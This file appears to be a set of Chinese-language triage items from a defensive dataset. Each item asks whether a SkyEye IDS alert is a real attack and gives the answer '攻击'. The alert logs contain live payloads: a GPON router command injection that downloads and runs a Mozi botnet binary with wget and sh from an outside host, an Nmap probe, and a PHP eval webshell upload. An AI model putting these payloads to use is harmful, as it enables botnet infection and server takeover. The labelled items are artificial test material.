你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732675874", "vlan_id": "", "vuln_type": "Shell命令执行(机器学习)", "rule_version_str": "3.0.1122.14572", "attack_type": "命令执行", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.243", "sip_group": "", "repeat_count": "1", "type": "命令执行", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732675874, "vuln_harm": "shell命令执行攻击是危害极高的攻击形式,攻击成功可以造成服务器被控制。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.31.193.243", "site_app": "", "hit_end": 0, "uri": "/GponForm/diag_Form?images/", "dport": 80, "vuln_name": "Shell命令执行(机器学习)", "rsp_status": 0, "code_language": "", "solution": "后端服务器语言中,严禁执行shell命令。", "hit_start": 0, "detail_info": "通过机器学习方式,检测到访问中存在shell命令执行攻击代码。", "xff": "", "sip": "117.217.138.79", "vuln_desc": "通过机器学习方式,检测到访问中存在shell命令执行攻击代码。", "public_date": "2020-11-25 19:51:41", "sport": 34328}, "solution": "后端服务器语言中,严禁执行shell命令。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvR3BvbkZvcm0vZGlhZ19Gb3JtP2ltYWdlcy8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMTo4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogSGVsbG8sIFdvcmxkDQpDb250ZW50LUxlbmd0aDogMTE4DQoNCg==", "req_body": "WFdlYlBhZ2VOYW1lPWRpYWcmZGlhZ19hY3Rpb249cGluZyZ3YW5fY29ubGlzdD0wJmRlc3RfaG9zdD1gYDt3Z2V0K2h0dHA6Ly8xMTcuMjE3LjEzOC43OTo1MjczMy9Nb3ppLm0rLU8rLT4vdG1wL2dwb244MDtzaCsvdG1wL2dwb244MCZpcHY9MA==", "rsp_header": "", "rsp_body": ""}, "detail_info": "通过机器学习方式,检测到访问中存在shell命令执行攻击代码。", "file_md5": "", "host": "127.0.0.1:80", "host_state": "失败", "rule_key": "webids", "connection": "keep-alive", "api": "127.0.0.1:80/GponForm/diag_Form", "first_access_time": "2024-11-27 10:51:14", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "", "rsp_body": "", "h_method": "POST", "sip_addr": "印度--卡纳塔克邦--班加罗尔", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Shell命令执行(机器学习)", "alarm_sip": "172.31.193.243", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "166a5494ca2f899bde552dfd65b3cd14", "proto": "http", "xff": "", "alarm_id": "20241127_e92d9e53b9c66549c01a49e3b04c6c42", "vuln_desc": "通过机器学习方式,检测到访问中存在shell命令执行攻击代码。", "attack_chain": "0x02020000", "access_time": "2024-11-27 10:51:14", "content-length": "118", "attack_addr": "印度--卡纳塔克邦--班加罗尔(12.977788/77.607407)", "type_chain": "16090000", "vuln_harm": "shell命令执行攻击是危害极高的攻击形式,攻击成功可以造成服务器被控制。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732675854", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "117.217.138.79", "public_date": "2020-11-25 19:51:41", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/GponForm/diag_Form", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/GponForm/diag_Form?images/", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x10020b6e", "req_header": "POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 127.0.0.1:80\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nContent-Length: 118\r\n\r\n", "req_body": "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://117.217.138.79:52733/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "117.217.138.79", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569454-Shell命令执行(机器学习)", "rule_labels": "{\"0x110700\": {\"parent_name\": \"\", \"type\": \"\", \"name\": \"二次访问分析\", \"parent_id\": \"0\", \"info\": \"117.217.138.79\", \"port\": \"52733\", \"proto\": \"TCP\"}}", "host_md5": "cef54f47984626c9efbf070c50bfad1b", "sport": "34328", "h_url": "/GponForm/diag_Form?images/", "accept-encoding": "gzip, deflate", "user-agent": "Hello, World"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732675874", "vlan_id": "", "vuln_type": "发现后门程序 Mozi.P2P Botnet 攻击探测行为", "rule_version_str": "3.0.1122.14572", "attack_type": "后门程序", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.243", "sip_group": "", "repeat_count": "1", "type": "后门程序", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732675874, "vuln_harm": "Mozi僵尸网络会利用一些已知漏洞Payload发起探测攻击,攻击成功则可连接网络节点下载并执行名为Mozi.a、Mozi.m、Mozi.z等僵尸网络样本,注册自身为新的僵尸网络节点。受攻击的设备包括GPON光纤设备、NetGear路由设备、华为HG532交换机系列、D-Link路由设备、使用Realtek SDK的设备、Vacron监控摄像机、斐讯路由器、 USR-G806 4G工业无线路由器等。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.31.193.243", "site_app": "", "hit_end": 100, "uri": "/GponForm/diag_Form?images/", "dport": 80, "vuln_name": "发现后门程序 Mozi.P2P Botnet 攻击探测行为", "rsp_status": 0, "code_language": "", "solution": "确认攻击流量源IP设备状态,查杀清除后门并进行安全加固。", "hit_start": 80, "detail_info": "Mozi僵尸网络是于2019年底首次出现在针对路由器和DVR 的攻击场景上的一种P2P僵尸网络。主要攻击目标为物联网(IoT)设备,包括网件、D-Link和华为等路由设备。", "xff": "", "sip": "117.217.138.79", "vuln_desc": "Mozi僵尸网络是于2019年底首次出现在针对路由器和DVR 的攻击场景上的一种P2P僵尸网络。主要攻击目标为物联网(IoT)设备,包括网件、D-Link和华为等路由设备。", "public_date": "2023-03-31 14:48:07", "sport": 34328}, "solution": "确认攻击流量源IP设备状态,查杀清除后门并进行安全加固。", "hit_start": "80", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvR3BvbkZvcm0vZGlhZ19Gb3JtP2ltYWdlcy8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMTo4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogSGVsbG8sIFdvcmxkDQpDb250ZW50LUxlbmd0aDogMTE4DQoNCg==", "req_body": "WFdlYlBhZ2VOYW1lPWRpYWcmZGlhZ19hY3Rpb249cGluZyZ3YW5fY29ubGlzdD0wJmRlc3RfaG9zdD1gYDt3Z2V0K2h0dHA6Ly8xMTcuMjE3LjEzOC43OTo1MjczMy9Nb3ppLm0rLU8rLT4vdG1wL2dwb244MDtzaCsvdG1wL2dwb244MCZpcHY9MA==", "rsp_header": "", "rsp_body": ""}, "detail_info": "Mozi僵尸网络是于2019年底首次出现在针对路由器和DVR 的攻击场景上的一种P2P僵尸网络。主要攻击目标为物联网(IoT)设备,包括网件、D-Link和华为等路由设备。", "file_md5": "", "host": "127.0.0.1:80", "host_state": "失败", "rule_key": "webids", "connection": "keep-alive", "api": "127.0.0.1:80/GponForm/diag_Form", "first_access_time": "2024-11-27 10:51:14", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_body", "rsp_body": "", "h_method": "POST", "sip_addr": "印度--卡纳塔克邦--班加罗尔", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现后门程序 Mozi.P2P Botnet 攻击探测行为", "alarm_sip": "172.31.193.243", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "d2d689d7f6bb4a91c33f0e2cb49eb472", "proto": "http", "xff": "", "alarm_id": "20241127_7293a2a252701f1044532297c958f6be", "vuln_desc": "Mozi僵尸网络是于2019年底首次出现在针对路由器和DVR 的攻击场景上的一种P2P僵尸网络。主要攻击目标为物联网(IoT)设备,包括网件、D-Link和华为等路由设备。", "attack_chain": "0x02020000", "access_time": "2024-11-27 10:51:14", "content-length": "118", "attack_addr": "印度--卡纳塔克邦--班加罗尔(12.977788/77.607407)", "type_chain": "14010000", "vuln_harm": "Mozi僵尸网络会利用一些已知漏洞Payload发起探测攻击,攻击成功则可连接网络节点下载并执行名为Mozi.a、Mozi.m、Mozi.z等僵尸网络样本,注册自身为新的僵尸网络节点。受攻击的设备包括GPON光纤设备、NetGear路由设备、华为HG532交换机系列、D-Link路由设备、使用Realtek SDK的设备、Vacron监控摄像机、斐讯路由器、 USR-G806 4G工业无线路由器等。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732675852", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "117.217.138.79", "public_date": "2023-03-31 14:48:07", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/GponForm/diag_Form", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "恶意软件", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "100", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/GponForm/diag_Form?images/", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x10020bd8", "req_header": "POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 127.0.0.1:80\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nContent-Length: 118\r\n\r\n", "req_body": "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://117.217.138.79:52733/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "117.217.138.79", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569560-发现后门程序 Mozi.P2P Botnet 攻击探测行为", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"hw_type\": \"PC\"}}", "host_md5": "cef54f47984626c9efbf070c50bfad1b", "sport": "34328", "h_url": "/GponForm/diag_Form?images/", "accept-encoding": "gzip, deflate", "user-agent": "Hello, World"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732675874", "vlan_id": "", "vuln_type": "发现系统命令注入行为", "rule_version_str": "3.0.1122.14572", "attack_type": "命令执行", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.243", "sip_group": "", "repeat_count": "1", "type": "命令执行", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732675874, "vuln_harm": "攻击成功可以造成服务器被控制。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.31.193.243", "site_app": "其他", "hit_end": 126, "uri": "/GponForm/diag_Form?images/", "dport": 80, "vuln_name": "发现系统命令注入行为", "rsp_status": 0, "code_language": "其他", "solution": "1.禁掉一些不用的系统命令执行函数。\r\n2.权限控制严格。", "hit_start": 106, "detail_info": "命令执行攻击是危害极高的攻击形式,一般是服务器代码对用户输入控制不严格导致执行任意命令,也包含攻击者上传了一个后门,通过后门执行了任意命令。", "xff": "", "sip": "117.217.138.79", "vuln_desc": "命令执行攻击是危害极高的攻击形式,一般是服务器代码对用户输入控制不严格导致执行任意命令,也包含攻击者上传了一个后门,通过后门执行了任意命令。", "public_date": "2018-04-03 17:04:56", "sport": 34328}, "solution": "1.禁掉一些不用的系统命令执行函数。\r\n2.权限控制严格。", "hit_start": "106", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvR3BvbkZvcm0vZGlhZ19Gb3JtP2ltYWdlcy8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMTo4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogSGVsbG8sIFdvcmxkDQpDb250ZW50LUxlbmd0aDogMTE4DQoNCg==", "req_body": "WFdlYlBhZ2VOYW1lPWRpYWcmZGlhZ19hY3Rpb249cGluZyZ3YW5fY29ubGlzdD0wJmRlc3RfaG9zdD1gYDt3Z2V0K2h0dHA6Ly8xMTcuMjE3LjEzOC43OTo1MjczMy9Nb3ppLm0rLU8rLT4vdG1wL2dwb244MDtzaCsvdG1wL2dwb244MCZpcHY9MA==", "rsp_header": "", "rsp_body": ""}, "detail_info": "命令执行攻击是危害极高的攻击形式,一般是服务器代码对用户输入控制不严格导致执行任意命令,也包含攻击者上传了一个后门,通过后门执行了任意命令。", "file_md5": "", "host": "127.0.0.1:80", "host_state": "失败", "rule_key": "webids", "connection": "keep-alive", "api": "127.0.0.1:80/GponForm/diag_Form", "first_access_time": "2024-11-27 10:51:14", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_body", "rsp_body": "", "h_method": "POST", "sip_addr": "印度--卡纳塔克邦--班加罗尔", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现系统命令注入行为", "alarm_sip": "172.31.193.243", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "2fbb85698d827e7df846c34a098c7fad", "proto": "http", "xff": "", "alarm_id": "20241127_54ce8d9bffd88abcc9679122fc41384c", "vuln_desc": "命令执行攻击是危害极高的攻击形式,一般是服务器代码对用户输入控制不严格导致执行任意命令,也包含攻击者上传了一个后门,通过后门执行了任意命令。", "attack_chain": "0x02010000", "access_time": "2024-11-27 10:51:14", "content-length": "118", "attack_addr": "印度--卡纳塔克邦--班加罗尔(12.977788/77.607407)", "type_chain": "16090000", "vuln_harm": "攻击成功可以造成服务器被控制。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732675852", "code_language": "其他", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "117.217.138.79", "public_date": "2018-04-03 17:04:56", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/GponForm/diag_Form", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "site_app": "其他", "super_attack_chain": "0x02000000", "hit_end": "126", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/GponForm/diag_Form?images/", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x10001384", "req_header": "POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 127.0.0.1:80\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nContent-Length: 118\r\n\r\n", "req_body": "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://117.217.138.79:52733/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "117.217.138.79", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268440452-发现系统命令注入行为", "rule_labels": "{\"0x110700\": {\"parent_name\": \"\", \"type\": \"\", \"name\": \"二次访问分析\", \"parent_id\": \"0\", \"info\": \"117.217.138.79\", \"port\": \"52733\", \"proto\": \"TCP\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"hw_type\": \"PC\"}}", "host_md5": "cef54f47984626c9efbf070c50bfad1b", "sport": "34328", "h_url": "/GponForm/diag_Form?images/", "accept-encoding": "gzip, deflate", "user-agent": "Hello, World"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732675374", "vlan_id": "", "vuln_type": "发现NMAP探测行为(SSL)", "attack_type": "信息泄露", "dip_group": "未分配资产组", "is_web_attack": "0", "nid": "", "dip": "172.23.68.194", "sip_group": "", "repeat_count": "1", "type": "信息泄露", "skyeye_type": "webids-ids_dolog", "_origin": {"write_date": 1732675374, "rule_name": "发现NMAP探测行为(SSL)", "hit_field": "", "description": "1", "dip": "172.23.68.194", "protocol_id": 6, "hit_end": 163, "uri": "", "cnnvd_id": "", "dport": 30002, "rule_version": "3.0.1122.14572", "hit_start": 143, "detail_info": "发现主机或服务器信息探测行为。类似Nmap这样的扫描器正在探测主机或服务器的存活状态、操作系统版本等信息。攻击者通过收集此类信息,以实施进一步攻击。", "packet_size": 164, "appid": 19, "proto": "ssl", "xff": "", "sip": "175.178.170.188", "attack_method": "远程", "affected_system": "", "sig_id": 2539, "sport": 33382, "bulletin": "排查来源IP是否是攻击者,如果是,建议封禁该IP。"}, "hit_start": "143", "skyeye_id": "", "payload": {"packet_data": "ACSs3Z37AJShXm6HCABFoACWW0VAADMGoDSvsqq8rBdEwoJmdTKr+r7XpTXuU1AY+vDbbgAAFgMAAGkBAABlAwNVHKfkcmFuZG9tMXJhbmRvbTJyYW5kb20zcmFuZG9tNAAADAAvAAoAEwA5AAQA/wEAADAADQAsACoAAQADAAIGAQYDBgICAQIDAgIDAQMDAwIEAQQDBAIBAQEDAQIFAQUDBQI="}, "detail_info": "发现主机或服务器信息探测行为。类似Nmap这样的扫描器正在探测主机或服务器的存活状态、操作系统版本等信息。攻击者通过收集此类信息,以实施进一步攻击。", "file_md5": "", "host": "", "host_state": "企图", "rule_key": "webids", "api": "", "first_access_time": "2024-11-27 10:42:54", "hazard_level": "4", "hazard_rating": "中危", "rule_name": "发现NMAP探测行为(SSL)", "packet_data": "ACSs3Z37AJShXm6HCABFoACWW0VAADMGoDSvsqq8rBdEwoJmdTKr+r7XpTXuU1AY+vDbbgAAFgMAAGkBAABlAwNVHKfkcmFuZG9tMXJhbmRvbTJyYW5kb20zcmFuZG9tNAAADAAvAAoAEwA5AAQA/wEAADAADQAsACoAAQADAAIGAQYDBgICAQIDAgIDAQMDAwIEAQQDBAIBAQEDAQIFAQUDBQI=", "hit_field": "", "sip_addr": "中国", "protocol_id": "6", "cnnvd_id": "", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "alarm_sip": "172.23.68.194", "rule_desc": "网络攻击", "rule_version": "3.0.1122.14572", "skyeye_index": "", "sip_ioc_dip": "07020839955339ae3a909302a1570aa3", "proto": "ssl", "xff": "", "alarm_id": "20241127_f9fd6df35f5ea9f19023ddd8a345c2ec", "attack_chain": "0x01050000", "access_time": "2024-11-27 10:42:54", "attack_addr": "中国(39.902798/116.401159)", "type_chain": "16160000", "description": "1", "dip_addr": "局域网", "dport": "30002", "alert_devip": "172.31.191.57", "rsp_status": "", "update_time": "1732675357", "branch_id": "QbJK/5PW2", "att_ck": "", "sip": "175.178.170.188", "attack_method": "远程", "affected_system": "", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "src_mac": "00:94:a1:5e:6e:87", "confidence": "中", "super_type": "攻击利用", "super_attack_chain": "0x01000000", "hit_end": "163", "serial_num": "QbJK/8ze/", "uri": "", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x59b6", "attack_org": "", "is_white": "0", "packet_size": "164", "alarm_sample": "1", "appid": "19", "attack_sip": "175.178.170.188", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "22966-发现NMAP探测行为(SSL)", "rule_labels": "{}", "sig_id": "2539", "host_md5": "", "sport": "33382", "bulletin": "排查来源IP是否是攻击者,如果是,建议封禁该IP。"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732673531", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "webshell上传", "_origin": {"write_date": 1732673531, "vuln_harm": "受害主机可能将会被植入后门、远控或木马,导致受害主机沦陷,成为傀儡机。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.31.193.55", "site_app": "其他", "hit_end": 212, "uri": "/wp-json/mwai-ui/v1/files/upload", "dport": 80, "vuln_name": "发现上传php_webshell木马行为", "rsp_status": 0, "code_language": "PHP", "solution": "请尽快排查受害主机上是否存在php_webshell并进行查杀,并修复系统漏洞。", "hit_start": 192, "detail_info": "发现上传php_webshell行为,php_webshell是用PHP语言编写的在线管理程序,实用、简洁、小巧。此告警发现黑客正在上传php后门程序,严重可导致服务器信息泄露。", "xff": "", "sip": "45.64.52.160", "vuln_desc": "发现上传php_webshell行为,php_webshell是用PHP语言编写的在线管理程序,实用、简洁、小巧。此告警发现黑客正在上传php后门程序,严重可导致服务器信息泄露。", "public_date": "2018-07-10 15:05:56", "sport": 53686}, "content-disposition": "form-data; filename=\"test.txt\"", "detail_info": "发现上传php_webshell行为,php_webshell是用PHP语言编写的在线管理程序,实用、简洁、小巧。此告警发现黑客正在上传php后门程序,严重可导致服务器信息泄露。", "file_md5": "", "rule_key": "webids", "connection": "close", "api": "www.hn.sgcc.cn/wp-json/mwai-ui/v1/files/upload", "first_access_time": "2024-11-27 10:12:11", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--香港特别行政区--中国香港", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现上传php_webshell木马行为", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "cf1c6961031a2a2c94f70fbfa476e06c", "xff": "", "vuln_desc": "发现上传php_webshell行为,php_webshell是用PHP语言编写的在线管理程序,实用、简洁、小巧。此告警发现黑客正在上传php后门程序,严重可导致服务器信息泄露。", "attack_chain": "0x02020000", "vuln_harm": "受害主机可能将会被植入后门、远控或木马,导致受害主机沦陷,成为傀儡机。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732673510", "code_language": "PHP", "public_date": "2018-07-10 15:05:56", "skyeye_serial_num": "QbJK/8ze/", "site_app": "其他", "super_attack_chain": "0x02000000", "hit_end": "212", "h_proto_version": "HTTP/1.1", "uri": "/wp-json/mwai-ui/v1/files/upload", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x1002052a", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "45.64.52.160", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "user-agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.414.0 Safari/534.1", "referer": "http://^url^/wp-json/mwai-ui/v1/files/upload", "vlan_id": "", "vuln_type": "发现上传php_webshell木马行为", "attack_type": "webshell上传", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "请尽快排查受害主机上是否存在php_webshell并进行查杀,并修复系统漏洞。", "hit_start": "192", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvd3AtanNvbi9td2FpLXVpL3YxL2ZpbGVzL3VwbG9hZCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogY2xvc2UNCkNvbnRlbnQtVHlwZTogbXVsdGlwYXJ0L2Zvcm0tZGF0YTsgYm91bmRhcnk9LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tN2JnaGJnZXJ1Z3k4N2dlcmJ1eQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogemgtY24NClJlZmVyZXI6IGh0dHA6Ly9edXJsXi93cC1qc29uL213YWktdWkvdjEvZmlsZXMvdXBsb2FkDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTWFjaW50b3NoOyBVOyBJbnRlbCBNYWMgT1MgWCAxMF82XzQ7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMSAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS82LjAuNDE0LjAgU2FmYXJpLzUzNC4xDQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IGZpbGVuYW1lPSJ0ZXN0LnR4dCINCkNvbnRlbnQtTGVuZ3RoOiAzNDkNCkhvc3Q6IHd3dy5obi5zZ2NjLmNuDQoNCg==", "req_body": "LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS03YmdoYmdlcnVneTg3Z2VyYnV5DQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImZpbGUiOyBmaWxlbmFtZT0iZXZlLnBocCINCkNvbnRlbnQtVHlwZTogdGV4dC9wbGFpbg0KDQo8P3BocCBjbGFzcyBDdXN0b21FeGVjdXRvciB7ICBwdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoJGNvZGUpeyAgQGV2YWwoIi8qQ3VzdG9tQ29kZUV4ZWN1dG9yKi8iIC4gJGNvZGUpOyAgfSB9ICBuZXcgQ3VzdG9tRXhlY3V0b3IoJF9SRVFVRVNUWydNJ10pOyA/PnNlcnRqZTV0DQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTdiZ2hiZ2VydWd5ODdnZXJidXktLQ==", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.cn", "host_state": "失败", "accept-language": "zh-cn", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_8db2d48591c41580bcffa3459538d566", "access_time": "2024-11-27 10:12:11", "content-length": "349", "attack_addr": "中国--香港特别行政区--中国香港(22.350617/114.184921)", "type_chain": "161C0000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "content-type": "multipart/form-data; boundary=------------------------7bghbgerugy87gerbuy", "sip": "45.64.52.160", "dimension": "3", "url_path": "/wp-json/mwai-ui/v1/files/upload", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /wp-json/mwai-ui/v1/files/upload HTTP/1.1\r\nConnection: close\r\nContent-Type: multipart/form-data; boundary=------------------------7bghbgerugy87gerbuy\r\nAccept: */*\r\nAccept-Language: zh-cn\r\nReferer: http://^url^/wp-json/mwai-ui/v1/files/upload\r\nUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.414.0 Safari/534.1\r\nContent-Disposition: form-data; filename=\"test.txt\"\r\nContent-Length: 349\r\nHost: www.hn.sgcc.cn\r\n\r\n", "req_body": "--------------------------7bghbgerugy87gerbuy\r\nContent-Disposition: form-data; name=\"file\"; filename=\"eve.php\"\r\nContent-Type: text/plain\r\n\r\n<?php class CustomExecutor { public function __construct($code){ @eval(\"/*CustomCodeExecutor*/\" . $code); } } new CustomExecutor($_REQUEST['M']); ?>sertje5t\r\n--------------------------7bghbgerugy87gerbuy--", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567850-发现上传php_webshell木马行为", "rule_labels": "{\"0x110101\": {\"parent_id\": \"0x110100\", \"type\": \"攻击阶段\", \"name\": \"后门上传\", \"parent_name\": \"后门上传利用\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"device\": \"Apple/Mac\", \"os\": \"Mac OS X/10.6\", \"software\": \"Chrome/6.0.414\", \"hw_type\": \"PC\"}}", "sport": "53686", "h_url": "/wp-json/mwai-ui/v1/files/upload"} | 攻击 |
